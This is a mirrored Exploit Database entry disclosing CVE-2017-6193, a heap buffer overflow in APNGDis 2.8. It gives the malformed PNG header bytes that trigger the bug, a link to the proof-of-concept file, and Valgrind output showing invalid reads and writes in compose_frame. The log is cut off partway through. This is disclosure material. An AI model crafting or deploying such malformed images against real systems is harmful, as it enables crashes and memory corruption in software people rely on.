APNGDis 2.8 – ‘image width / height chunk’ Heap Buffer Overflow

Exploit Database
104 阅读

作者： Alwin Peppels

日期： 2017-03-14
类别：
- dos
平台：
- multiple
来源：https://www.exploit-db.com/exploits/41669/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

# Exploit Title: APNGDis image width / height Buffer Overflow

# Date: 14-03-2017

# Exploit Author: Alwin Peppels

# Vendor Homepage: http://apngdis.sourceforge.net/

# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/

# Version: 2.8

# Tested on: Linux Debian / Windows 7

# CVE : CVE-2017-6193

Additional analysis:

https://www.onvio.nl/nieuws/cve-2017-6193

POC:

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41669.png

In the first bytes of the PoC, positions +0x10 through +0x17 are malformed to contain large values:

‰PNG........IHDR

89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52

........

00 0F 00 00 00 0F 00 00

^^^^^^^^

Valgrind:

Reading '../w_h_chunk_poc.png'...

==10563== Invalid read of size 8

==10563==at 0x4C30260: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)

==10563==by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)

==10563==by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)

==10563==by 0x10B24E: main (apngdis.cpp:498)

==10563==Address 0x5edb3c8 is 28,792 bytes inside a block of size 65,593 free'd

==10563==at 0x4C2CDDB: free (vg_replace_malloc.c:530)

==10563==by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)

==10563==by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176)

==10563==by 0x10A9FD: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:361)

==10563==by 0x10B24E: main (apngdis.cpp:498)

==10563==Block was alloc'd at

==10563==at 0x4C2BBAF: malloc (vg_replace_malloc.c:299)

==10563==by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)

==10563==by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)

==10563==by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)

==10563==by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58)

==10563==by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)

==10563==by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)

==10563==by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158)

==10563==by 0x10A891: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:337)

==10563==by 0x10B24E: main (apngdis.cpp:498)

==10563==

==10563== Invalid write of size 8

==10563==at 0x4C30265: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)

==10563==by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)

==10563==by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)

==10563==by 0x10B24E: main (apngdis.cpp:498)

==10563==Address 0x5edbad8 is 30,600 bytes inside a block of size 65,593 free'd